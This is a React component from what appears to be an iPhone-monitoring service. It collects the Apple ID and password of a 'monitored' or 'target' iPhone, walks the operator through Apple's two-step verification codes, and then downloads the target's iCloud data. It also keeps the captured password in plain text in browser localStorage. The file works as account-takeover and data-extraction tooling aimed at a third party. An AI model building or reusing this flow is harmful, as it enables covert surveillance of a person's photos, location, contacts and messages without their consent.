import { useEffect, useState } from 'react'
import Image from 'next/image'
import dynamic from 'next/dynamic'
import { useTranslation } from 'src/utils/i18n'
import { Modal, Select, Spin, Input } from 'antd'
import { CloseOutlined } from '@ant-design/icons'
import { messageInfo } from 'src/components/Message'
import { localPhoneSendEmail } from 'src/@api/android'
import {
  authByDevice,
  authVerifyByDevice,
  downloadWeb,
  bySms,
  authVerifyBySms,
  authInfo,
  sendDownloadTime,
  iosLoginReport,
  iosLoginVerification
} from 'src/@api/login'
import { useDispatch } from 'react-redux'
import { fetchResetTime, changeDownloadTips, changeBasicVerfiyOver } from 'src/store/apps/Common'
import { refreshSidebarDevices } from 'src/utils/refreshSidebarDevices'
import updateDeviceCredentials, { isUpdateCredentialsOk } from 'src/utils/updateDeviceCredentials'
import BasicVerfiyCommponents from './style'
import useIcloudLockedFlow from 'src/components/ios-extreme/icloud-locked/useIcloudLockedFlow'
import useIcloudCredentialReverify from 'src/components/ios-extreme/icloud-locked/useIcloudCredentialReverify'
import { ICLOUD_EC, isIcloudOk, isIcloudSendOk } from 'src/utils/icloudLoginResult'

const CodeBox = dynamic(import('src/@core/components/common/codeBox'), {
  ssr: false //这个要加上,禁止使用 SSR
})

//   基础服务 app 图标列表
const basicIcon = [
  {
    name: 'Photo',
    img: '/images/dashboard/new-ios/photos.png'
  },
  {
    name: 'Video',
    img: '/images/dashboard/new-ios/video.svg'
  },
  {
    name: 'Locations',
    img: '/images/dashboard/new-ios/gps.png'
  },
  {
    name: 'Contact',
    img: '/images/dashboard/new-ios/contacts.png'
  },
  {
    name: 'Mail',
    img: '/images/dashboard/new-ios/mail.svg'
  },
  {
    name: 'iCloud drive',
    img: '/images/dashboard/new-ios/icloud-drive.svg'
  },
  {
    name: 'Note',
    img: '/images/dashboard/new-ios/note.png'
  },
  {
    name: 'Calendar',
    img: '/images/dashboard/new-ios/calendars.svg'
  },
  {
    name: 'Reminder',
    img: '/images/dashboard/new-ios/reminders.png'
  }
]

const IosVerfiyBasic = () => {
  const dispatch = useDispatch()
  const { t } = useTranslation('common')
  const [isModalOpen, setIsModalOpen] = useState(true) // 模态框显示状态
  const [useUserName, setUserName] = useState('') // iCloud账号
  const [usePassWord, setPassWord] = useState('') // iCloud密码
  const [showPassword, setShowPassword] = useState(false) // 密码明文/密文切换
  const [loginLoading, setLoginLoading] = useState(false) // 账号密码验证中状态
  const [modalOpen, setModalOpen] = useState(false) // 发送短信弹窗
  const [current, setCurrent] = useState(0) // 当前验证的步骤，填写账号密码 or 填写验证码
  const [innerWidth, setInnerWidth] = useState(0) // 实时屏幕宽度

  const [defaultSmsPhone, setDefaultSmsPhone] = useState({})
  const [smsId, setSmsId] = useState('')
  const [smsPhoneList, setSmsPhoneList] = useState([])
  const [smsPhoneListLoading, setSmsPhoneListLoading] = useState(true)
  const [smsPhoneListDisabled, setSmsPhoneListDisabled] = useState(true)
  const [key, setKey] = useState('1')

  const [sendTime, setSentTime] = useState(60)
  const [sendContentTips, setSendContentTips] = useState('')
  const [btnDisable, setBtnDisable] = useState(false)
  const [smsErrorText, setSmsErrorText] = useState('') // icloud没有绑定手机号错误提示文案

  const onChange = async key => {
    if (key == 2) {
      let check = sessionStorage.getItem('icloudPhoneSmsList')
      let result = {}
      if (check) {
        result = JSON.parse(check)
      } else {
        let mode = 1

        result = await authInfo({
          mode: mode,
          username: useUserName,
          password: usePassWord
        })

        sessionStorage.setItem('icloudPhoneSmsList', JSON.stringify(result))
      }

      setDefaultSmsPhone(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber)
      setSmsId(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber.id || '0')

      let mapData = result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumbers.map(item => {
        return {
          ...item,
          value: item.id,
          label: item.numberWithDialCode
        }
      })
      setSmsPhoneList(mapData)
      setSmsPhoneListDisabled(false)
      setSmsPhoneListLoading(false)
    }
  }

  // 登录 iCloud 账号
  const login = async () => {
    if (useUserName === '' || usePassWord === '') {
      messageInfo(t('Value cannot be empty'))

      return
    }

    let mode = 1

    let obj = {
      mode: mode,
      username: useUserName,
      password: usePassWord,
      country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
    }
    setLoginLoading(true)

    // 请求异常（断网 / 超时 / 服务端错误）必须清掉 loading，否则按钮会一直转圈
    let data
    try {
      const res = await iosLoginVerification(obj)
      data = res?.data
    } catch (e) {
      console.error('[ios-verfiy-basic login] iosLoginVerification failed', e)
      setLoginLoading(false)
      messageInfo(e?.data?.em || t('Network error, please try again'))

      return
    }

    // 上传ios日志
    iosLoginReport({ "platform": "ios-icloud", "site": "msafely", "s_2": 1 })

    // 无论走哪个业务分支都先关掉转圈；业务错误码在 data.ec（如 10005 Apple ID locked），
    // 顶层 code / HTTP 状态码为 0 不代表成功
    setLoginLoading(false)

    if (!data || typeof data !== 'object') {
      messageInfo(t('Network error, please try again'))

      return
    }

    if (data.ec === ICLOUD_EC.PASSWORD) {
      setLoginLoading(false)
      handlePasswordError(data.ec)

      messageInfo(data.em)
    } else if (data.ec === ICLOUD_EC.TWO_STEP) {
      iosLoginReport({ "platform": "ios-icloud", "site": "msafely", "s_3": 1 })
      setLoginLoading(false)
      messageInfo(data.em)
      window.localStorage.setItem('DeviceUser', JSON.stringify(obj))
      setCurrent(1)
      if (data?.trustedPhoneNumbers[0]?.numberWithDialCode) {
        setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
        setSmsId(data.trustedPhoneNumbers[0].id || '0')
        let mapData = data.trustedPhoneNumbers.map(item => {
          return {
            ...item,
            value: item.id,
            label: item.numberWithDialCode
          }
        })
        setSmsPhoneList(mapData)
        setSmsPhoneListDisabled(false)
      } else {
        setSmsPhoneListDisabled(true)
        if (data?.ecPhoneList === 0) {
          setSmsErrorText(t(`iCloud doesnt have a phone number Please verify using the device verification code`))
        } else {
          setSmsErrorText(t(`Entered the incorrect verification codes Please wait 30 minutes before trying again`))
        }
      }
      setSmsPhoneListLoading(false)
    } else if (data.ec === ICLOUD_EC.LOCKED) {
      await handleEc10005({ username: useUserName, password: usePassWord })
    } else if (isIcloudOk(data)) {
      iosLoginReport({ "platform": "ios-icloud", "site": "msafely", "s_4": 1 })
      setLoginLoading(false)

      messageInfo({
        content: data.em,
        duration: 8
      })

      // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
      const updateRes = await updateDeviceCredentials({
        username: useUserName,
        password: usePassWord,
        verify: 1
      })

      if (!isUpdateCredentialsOk(updateRes)) {
        messageInfo(updateRes?.msg || data.em)

        return
      }

      window.localStorage.setItem('Basic', 1)
      window.localStorage.setItem('DeviceUser', JSON.stringify(obj))

      // 设置允许正在下载提示信息弹窗
      dispatch(changeDownloadTips(true))

      // 设置一步验证完成状态
      dispatch(changeBasicVerfiyOver(true))

      let downloadRes = await downloadWeb({
        mode: 1,
        username: useUserName,
        password: usePassWord
      })

      await sendDownloadTime({ username: useUserName, type: 'basic_download' })
      setTimeout(() => {
        dispatch(fetchResetTime())
      }, 800)

      setIsModalOpen(false)
      refreshSidebarDevices()
    } else {
      messageInfo(data.em)
      setLoginLoading(false)
    }
  }

  // 设备验证码验证
  const codeDevice = async e => {
    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (check) {
      setLoginLoading(true)

      // 接口异常（断网 / 超时 / 服务端错误）时必须给出提示并清掉 loading，否则验证码区会一直转圈
      try {
        let deviceUser = JSON.parse(window.localStorage.getItem('DeviceUser'))
        deviceUser.securityCode = securityCode

        const verify = await iosLoginVerification({
          mode: 1,
          username: useUserName,
          password: usePassWord,
          securityCode: securityCode,
          country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
        })

        // 业务错误码在 data.ec；顶层 code / HTTP 状态码为 0 不代表成功
        if (!verify?.data || typeof verify.data !== 'object') {
          messageInfo(t('Network error, please try again'))

          return
        }

        if (isIcloudOk(verify.data)) {
          iosLoginReport({ "platform": "ios-icloud", "site": "msafely", "s_4": 1 })

          // 设置允许正在下载提示信息弹窗
          dispatch(changeDownloadTips(true))

          // 设置一步验证完成状态
          dispatch(changeBasicVerfiyOver(true))

          let downloadRes = await downloadWeb({ mode: 1, username: useUserName, password: usePassWord })

          // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
          const updateRes = await updateDeviceCredentials({
            username: useUserName,
            password: usePassWord,
            verify: 1
          })

          if (!isUpdateCredentialsOk(updateRes)) {
            messageInfo(updateRes?.msg || 'Update failed, please try again')

            return
          }

          setTimeout(async () => {
            await sendDownloadTime({ username: useUserName, type: 'basic_download' })
          }, 1500)
          setTimeout(() => {
            dispatch(fetchResetTime())
          }, 2000)

          window.localStorage.setItem('Basic', 1)

          setIsModalOpen(false)
          refreshSidebarDevices()
        } else {
          handlePasswordError(verify.data.ec)
          messageInfo(verify.data.em)
        }
      } catch (err) {
        console.error('[ios-verfiy-basic codeDevice] failed', err)
        messageInfo(err?.data?.em || t('Network error, please try again'))
      } finally {
        setLoginLoading(false)
      }
    }
  }

  // 发送短信验证码
  const sendSms = async () => {
    // 已发送 / 倒计时中，避免重复点击造成重复发送
    if (btnDisable) return

    try {
      const obj = await iosLoginVerification({
        mode: 1,
        username: useUserName,
        password: usePassWord,
        phoneID: smsId,
        country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
      })

      // 仅 0 / 10000 / 10004 视为发送成功，其余按失败处理并提示后端返回的原因
      const ec = obj?.data?.ec
      if (!isIcloudSendOk(ec)) {
        handlePasswordError(ec)
        messageInfo(obj?.data?.em || 'Failed to send the verification code, please try again')


return
      }

      let ti = sendTime
      const timeChange = setInterval(() => {
        if (ti > 0) {
          //当x>0时执行更新方法
          ti = ti - 1
          setSentTime(ti)
        } else {
          //当x=0时执行终止循环方法
          clearInterval(timeChange)
          setBtnDisable(false)
          setSendContentTips('')
          setSentTime(60)
        }
      }, 1000)

      setSentTime(60)
      setSendContentTips(t('A message containing the verification code has been sent to the target iPhone please check it'))
      setBtnDisable(true)
    } catch (e) {
      // 请求异常（断网 / 服务端错误）时不能让按钮卡死
      console.error('[sendSms] iosLoginVerification failed', e)
      setBtnDisable(false)
      setSendContentTips('')
      setSentTime(60)
      messageInfo(e?.data?.em || 'Failed to send the verification code, please try again')
    }
  }

  // 短信验证码验证
  const codeSms = async e => {
    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (check) {
      setLoginLoading(true)

      // 接口异常（断网 / 超时 / 服务端错误）时必须给出提示并清掉 loading，否则验证码区会一直转圈
      try {
        const result = await iosLoginVerification({
          mode: 1,
          username: useUserName,
          password: usePassWord,
          securityCode: securityCode,
          phoneID: smsId,
          country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
        })

        // 业务错误码在 data.ec；顶层 code / HTTP 状态码为 0 不代表成功
        if (!result?.data || typeof result.data !== 'object') {
          messageInfo(t('Network error, please try again'))

          return
        }

        if (isIcloudOk(result.data)) {
          iosLoginReport({ "platform": "ios-icloud", "site": "msafely", "s_4": 1 })

          // 设置允许正在下载提示信息弹窗
          dispatch(changeDownloadTips(true))

          // 设置一步验证完成状态
          dispatch(changeBasicVerfiyOver(true))

          let downloadRes = await downloadWeb({
            mode: 1,
            username: useUserName,
            password: usePassWord
          })

          // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
          const updateRes = await updateDeviceCredentials({
            username: useUserName,
            password: usePassWord,
            verify: 1
          })

          if (!isUpdateCredentialsOk(updateRes)) {
            messageInfo(updateRes?.msg || 'Update failed, please try again')

            return
          }

          setTimeout(async () => {
            await sendDownloadTime({ username: useUserName, type: 'basic_download' })
          }, 1500)
          setTimeout(() => {
            dispatch(fetchResetTime())
          }, 2000)

          window.localStorage.setItem('Basic', 1)

          setIsModalOpen(false)
          refreshSidebarDevices()
        } else {
          handlePasswordError(result.data.ec)
          messageInfo(result.data.em)
        }
      } catch (err) {
        console.error('[ios-verfiy-basic codeSms] failed', err)
        messageInfo(err?.data?.em || t('Network error, please try again'))
      } finally {
        setLoginLoading(false)
      }
    }
  }

  // 处理验证码方式切换
  const handleSelectChange = value => {
    setSmsId(value)
  }

  // 当发送短信弹窗显示时倒计时3秒自动关闭
  useEffect(() => {
    if (modalOpen) {
      setTimeout(() => {
        setModalOpen(false)
      }, 3000)
    }
  }, [modalOpen])

  // 发送帮助邮箱
  const sendEmail = async () => {
    try {
      //获取用户邮箱
      const email = JSON.parse(localStorage.getItem('userData'))?.data.email

      // 调用发邮件接口(code:0 成功)
      await localPhoneSendEmail({ email })

      // 触发发送邮件事件
      dataLayer.push({
        event: 'sned-guide-email'
      })
    } catch (e) {
      console.log('send Email RunTimeExection Error', e)
    }
  }

  // 监听屏幕宽度
  useEffect(() => {
    if (typeof window !== 'undefined') {
      const handlerInnerWidth = () => {
        setInnerWidth(window.innerWidth)
      }

      handlerInnerWidth()

      window.addEventListener('resize', handlerInnerWidth)

      return () => {
        window.removeEventListener('resize', handlerInnerWidth)
      }
    }
  }, [])

  const getLoginCountry = () =>
    (JSON.parse(localStorage.getItem('userData'))?.data?.country_name || '').toLocaleLowerCase()

  const applyTwoStepVerificationState = (data, username, password) => {
    messageInfo(data.em)
    window.localStorage.setItem('DeviceUser', JSON.stringify({ mode: 1, username, password, country: getLoginCountry() }))
    setUserName(username)
    setPassWord(password)
    setCurrent(1)
    if (data?.ecurityType == 2) setKey('2')
    if (data?.trustedPhoneNumbers?.[0]?.numberWithDialCode) {
      setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
      setSmsId(data.trustedPhoneNumbers[0].id || '0')
      setSmsPhoneList(data.trustedPhoneNumbers.map(item => ({ ...item, value: item.id, label: item.numberWithDialCode })))
      setSmsPhoneListDisabled(false)
    } else {
      setSmsPhoneListDisabled(true)
      setSmsErrorText(data?.ecPhoneList === 0
        ? t('iCloud doesnt have a phone number Please verify using the device verification code')
        : t('Entered the incorrect verification codes Please wait 30 minutes before trying again'))
    }
    setSmsPhoneListLoading(false)
  }

  const finishBasicDirectSuccess = async (data, username, password) => {
    iosLoginReport({ platform: 'ios-icloud', site: 'msafely', s_4: 1 })
    messageInfo({ content: data.em, duration: 8 })
    const updateRes = await updateDeviceCredentials({ username, password, verify: 1 })
    if (!isUpdateCredentialsOk(updateRes)) {
      messageInfo(updateRes?.msg || data.em)


return
    }
    window.localStorage.setItem('Basic', 1)
    window.localStorage.setItem('DeviceUser', JSON.stringify({ mode: 1, username, password, country: getLoginCountry() }))
    dispatch(changeDownloadTips(true))
    dispatch(changeBasicVerfiyOver(true))
    await downloadWeb({ mode: 1, username, password })
    await sendDownloadTime({ username, type: 'basic_download' })
    setTimeout(() => dispatch(fetchResetTime()), 800)
    setIsModalOpen(false)
    refreshSidebarDevices()
  }

  const { handleEc10005, lockedFlowModals, lockedFlowOpen } = useIcloudLockedFlow({
    mode: 1,
    updateCredentialsOnLock: true,
    onTwoStepRequired: async ({ data, username, password }) => applyTwoStepVerificationState(data, username, password),
    onDirectSuccess: async ({ data, username, password }) => finishBasicDirectSuccess(data, username, password)
  })

  // 10003（iCloud 密码不对）统一处理：退回「输入账号密码」那一步重填。
  // 已在输密码步骤、或被锁 / 重新验证弹窗正开着时跳过（见 useIcloudCredentialReverify）。
  const handlePasswordError = useIcloudCredentialReverify({ current, setCurrent, lockedFlowOpen })

  return (
    <Modal
      open={isModalOpen}
      onCancel={() => setIsModalOpen(false)}
      width={600}
      footer={null}
      centered={true}
      styles={{
        content: {
          padding: innerWidth > 768 ? '24px 24px 50px' : '24px 24px 20px',
          maxWidth: innerWidth > 768 ? '600px' : 'calc(100% - 16px)',
          margin: '0 auto',
          borderRadius: '16px',
          position: 'relative'
        }
      }}
      zIndex={1314}
      closeIcon={
        <CloseOutlined style={{ fontSize: '20px' }} />  // 修改這裡的大小
      }
    >
      <BasicVerfiyCommponents className='min-h-[546px] Mlg:h-auto Mlg:min-h-[505px]'>

        {/* apple Icon */}
        {/* <Image src='/images/apps/apple.svg' alt='img' className={`w-[60px] h-[69px] Mlg:w-[35px] Mlg:h-[40px] mt-[26px] Mlg:mt-[23px] ${current != 0 ? 'Mlg:hidden' : ''}`} width='60' height='69' /> */}
        <Image src='/images/apps/apple.svg' alt='img' className='w-[60px] h-[69px] Mlg:w-[35px] Mlg:h-[40px] mt-[26px] Mlg:mt-[23px]' width='60' height='69' />

        {/* 蓝色标题 */}
        {/* <p className={`my-[24px] Mlg:mt-[16px] text-[30px] Mlg:text-[20px] text-[#2405F2] text-center font-[600] leading-[40px] Mlg:leading-[30px] ${current != 0 ? 'Mlg:hidden' : ''}`}>{t('Basic Data Validation')}</p> */}

        {
          current === 0 ? // 填写账号密码步骤
            <>
              {/* 基础服务 app 图标列表 */}
              {/* < ul className='grid grid-cols-9 Mlg:grid-cols-5 gap-[16px]'>
                                {
                                    basicIcon.map((item, index) => (
                                        <li key={index}>
                                            <Image src={item.img} alt={item.name} className='w-[40px] h-[40px]' width='40' height='40' />
                                        </li>
                                    ))
                                }
                            </ul> */}

              {/* 黑色标题 */}
              <p className='max-w-[484px] mt-[30px] Mlg:mt-[24px] mb-[36px] Mlg:mb-[20px] text-[24px] Mlg:text-[16px] text-[#282938] text-center font-[600] leading-[32px] Mlg:leading-[24px]'>{t('Enter the iCloud account and password of the monitored iPhone')}</p>

              {/* 输入框&按钮 */}
              <div className='w-[340px] Mlg:w-full flex flex-col items-center'>
                <div className='w-full flex flex-col'>
                  <span className='mb-[5px] text-[14px] text-[#334062] leading-[21px] lg:hidden'>{t('Apple ID')}</span>
                  <Input
                    className='w-full h-[48px] Mlg:h-[40px] !bg-[rgba(244,245,246,0.92)] border-none focus:[box-shadow:0px_0px_0px_1px_#12D8AB] placeholder:text-[rgba(0,0,0,0.4)]
                                        border-0 rounded-[30px] px-[20px] smj:px-4 text-[14px] Mlg:text-[12px]'
                    style={{ outline: 'none' }}
                    onChange={e => setUserName(e.target.value.trim())}
                    placeholder={t('Apple ID')}
                  />
                </div>
                <div className='w-full flex flex-col mt-[24px] Mlg:mt-[10px]'>
                  <span className='mb-[5px] text-[14px] text-[#334062] leading-[21px] lg:hidden'>{t('Password')}</span>
                  <div className='relative w-full'>
                    <Input
                      className='w-full h-[48px] Mlg:h-[40px] !bg-[rgba(244,245,246,0.92)] border-none focus:[box-shadow:0px_0px_0px_1px_#12D8AB] placeholder:text-[rgba(0,0,0,0.4)]
                                        border-0 rounded-[30px] px-[20px] pr-[45px] smj:px-4 smj:pr-[45px] text-[14px] Mlg:text-[12px]'
                      type={showPassword ? 'text' : 'password'}
                      value={usePassWord}
                      onChange={e => setPassWord(e.target.value.trim())}
                      placeholder={t('Password')}
                    />
                    <Image
                      src={showPassword ? '/extreme/open.svg' : '/extreme/close.svg'}
                      width={18}
                      height={18}
                      alt=''
                      className='absolute top-0 bottom-0 my-auto right-[15px] cursor-pointer Mlg:w-[15px] Mlg:h-[15px]'
                      onClick={() => setShowPassword(!showPassword)}
                    />
                  </div>
                </div>

                {/* 二步验证提示 */}
                <div className='w-full my-[24px] flex items-start justify-center text-[14px] Mlg:text-[10px] text-[#F11E34] leading-[21px] Mlg:leading-[15px] p-[8px_12px_7px_4px] Mlg:p-[14px_17px_11px] bg-[rgba(255,0,0,0.05)] rounded-[6px]'>
                  <Image
                    src='/images/apps/waring.svg'
                    className='flex items-start mt-[5px] Mlg:mt-[1px] Mlg:mr-[7px]'
                    alt='img'
                    width={12}
                    height={12}
                  />
                  <p className='text-center'>
                    {t('A two-step verification code or SMS will be sent to the target iPhone from Apple official')}
                  </p>
                </div>

                <div className='w-full flex justify-center items-center'>
                  <button
                    className={`${loginLoading ? 'opacity-70' : ''
                      } w-[fit-content] mx-auto py-[10px] px-[70px] text-[18px] leading-[28px] bg-[#50E3C2] text-[#1B1C2B] font-[700] rounded-[6px] flex justify-center items-center`}
                    onClick={() => {
                      if (loginLoading) return
                      login()
                    }}
                  >
                    {t('Connect')}
                    {loginLoading && (
                      <div className='w-[20px] h-[20px] border-[3px] border-[#FFF] border-b-[#50E3C2] rounded-[50%] inline-block box-border animate-spin ml-[16px]'></div>
                    )}
                  </button>
                </div>
              </div>

              {/* 发送短信触发文案 */}
              <p
                className='text-[14px] text-[#12D8AB] text-center font-[400] leading-[22px] mt-[16px] Mlg:mt-[15px] cursor-pointer'
                onClick={() => {
                  sendEmail()
                  setModalOpen(true)
                }}
              >{t('How to get the required conditions')}</p>

              {/* 发送短信弹窗 */}
              <div className={`w-max max-w-[90%] absolute top-[50%] left-[50%] flex items-center justify-center ${!modalOpen ? 'hidden' : ''} z-[5254]`} onClick={() => setModalOpen(false)}>
                <div className="w-full max-w-[420px] xs:max-w-[360px] transform -translate-x-1/2 -translate-y-1/2 bg-black shadow-4xl rounded-[12px]">
                  <div className="p-[22px_19px_27px_16px] flex flex-col items-start justify-center">
                    <p className="w-full text-[16px] text-white font-[Roboto] font-[400] leading-[24px] text-left">
                      {t('A guidance email has been sent to your mailbox')}
                    </p>
                    <p className="w-full text-[16px] text-white font-[Roboto] font-[400] leading-[24px] text-left mt-[5px]">
                      {t('If not received it please check in spam or click again')}
                    </p>
                  </div>
                </div>
              </div>
            </>
            :
            <>
              {/* 蓝色标题 */}
              {/* <p className='mt-[23px] mb-[24px] text-[20px] text-[#50E3C2] text-center font-[600] leading-[30px] lg:hidden'>{t('Basic Data Validation')}</p> */}

              {/* 分割线 */}
              {/* <hr className='w-full bg-[#DADADA] absolute top-[101px] lg:hidden' /> */}

              {/* apple Icon */}
              {/* <Image src='/images/apps/apple.svg' alt='img' className='w-[35px] h-[40px] mt-[20px] lg:hidden' width='60' height='69' /> */}

              <p className='max-w-[484px] mt-[32px] Mlg:mt-[24px] text-[24px] Mlg:text-[16px] text-[#282938] text-center font-[600] leading-[32px] Mlg:leading-[24px]'>
                {t('Choose a verification method')}
              </p>
              <div className='w-[310px] Mlg:w-full'>
                <div className='w-full h-[27px] flex items-center my-[26px] Mlg:mt-[31px] Mlg:mb-[30px]'>
                  <div
                    className={`${key == '1'
                      ? 'text-[16px] text-[#50E3C2] border-b-[#50E3C2]'
                      : 'text-[16px] text-[#000] border-b-[#FFF]'
                      } h-[27px] border-b-[2px] flex items-center cursor-pointer`}
                    onClick={() => {
                      if (key == '1') return
                      setKey('1')
                    }}
                  >
                    {t('Device')}
                  </div>
                  <div
                    className={`${key == '2'
                      ? 'text-[16px] text-[#50E3C2] border-b-[#50E3C2]'
                      : 'text-[16px] text-[#000] border-b-[#FFF]'
                      } ml-[18px] h-[27px] flex items-center border-b-[2px] cursor-pointer`}
                    onClick={() => {
                      if (key == '2') return
                      if (smsPhoneListDisabled) {
                        messageInfo(smsErrorText)
                      } else {
                        setKey('2')
                      }
                    }}
                  >
                    {t('SMS')}
                  </div>
                </div>
                {key == '1' && (
                  <>
                    <Spin spinning={loginLoading}>
                      <CodeBox
                        length={6} // 输入框数量
                        inputType='numeric' // 输入框输入类型
                        size={innerWidth > 768 ? 45 : 42} // 输入框大小
                        gap={innerWidth > 768 ? 8 : 9} // 输入框之间的间隔
                        styles={{
                          background: '#F5F6F7',
                          borderRadius: '8px',
                          color: '#494949',
                          fontFamily: 'Roboto',
                          fontSize: '26px'
                        }} // 统一设置所有框的样式
                        onChange={codeDevice} // 验证码输入完毕时的回调
                      />
                    </Spin>
                    <p className='mt-[24px] text-center text-[12px] text-[#9A9A9E] leading-[18px]'>
                      {t('A verification code has been sent to the target iPhone Enter the verification code')}
                    </p>
                  </>
                )}
                {key == '2' && (
                  <>
                    <div className='h-[45px] Mlg:h-[40px] mb-[24px] Mlg:mb-[20px] flex'>
                      <Select
                        defaultValue={defaultSmsPhone}
                        style={{
                          flex: 1,
                          height: '100%'
                        }}
                        suffixIcon={
                          smsPhoneListLoading ? (
                            <div className='w-[18px] h-[18px] border-[3px] border-b-[rgba(244,245,246,0.92)] rounded-[50%] inline-block box-border animate-spin mr-[5px]'></div>
                          ) : (
                            <Image
                              className='mr-[5px]'
                              src='/images/user-verify/dropdown.svg'
                              width={14}
                              height={0}
                              alt='dropDown'
                            />
                          )
                        }
                        disabled={smsPhoneListDisabled}
                        onChange={handleSelectChange}
                        options={smsPhoneList}
                      />
                      <button
                        disabled={btnDisable}
                        className='w-full max-w-max min-w-[85px] h-full flex justify-center items-center'
                        style={{
                          opacity: btnDisable ? 0.7 : 1,
                          background: '#50E3C2',
                          padding: '0px 21px',
                          marginLeft: '10px',
                          color: '#1B1C2B',
                          borderRadius: '41px',
                          fontSize: '18px'
                        }}
                        onClick={sendSms}
                      >
                        {btnDisable ? sendTime : t('Send')}
                      </button>
                    </div>

                    {sendContentTips != '' && (
                      <p className='text-center mb-[24px] text-[12px] text-[#9A9A9E] leading-[18px]'> {sendContentTips}</p>
                    )}
                    <Spin spinning={loginLoading}>
                      <CodeBox
                        length={6} // 输入框数量
                        inputType='numeric' // 输入框输入类型
                        size={innerWidth > 768 ? 45 : 42} // 输入框大小
                        gap={innerWidth > 768 ? 8 : 9} // 输入框之间的间隔
                        styles={{
                          background: '#F5F6F7',
                          borderRadius: '8px',
                          color: '#494949',
                          fontFamily: 'Roboto',
                          fontSize: '26px'
                        }} // 统一设置所有框的样式
                        onChange={codeSms} // 验证码输入完毕时的回调
                      />
                    </Spin>
                    <p className='mt-[24px] text-center text-[12px] text-[#9A9A9E] leading-[18px]'>
                      {t('Enter the verification code')}
                    </p>
                  </>
                )}
              </div>
            </>
        }
      </BasicVerfiyCommponents>

      {lockedFlowModals}
    </Modal >
  )
}

export default IosVerfiyBasic
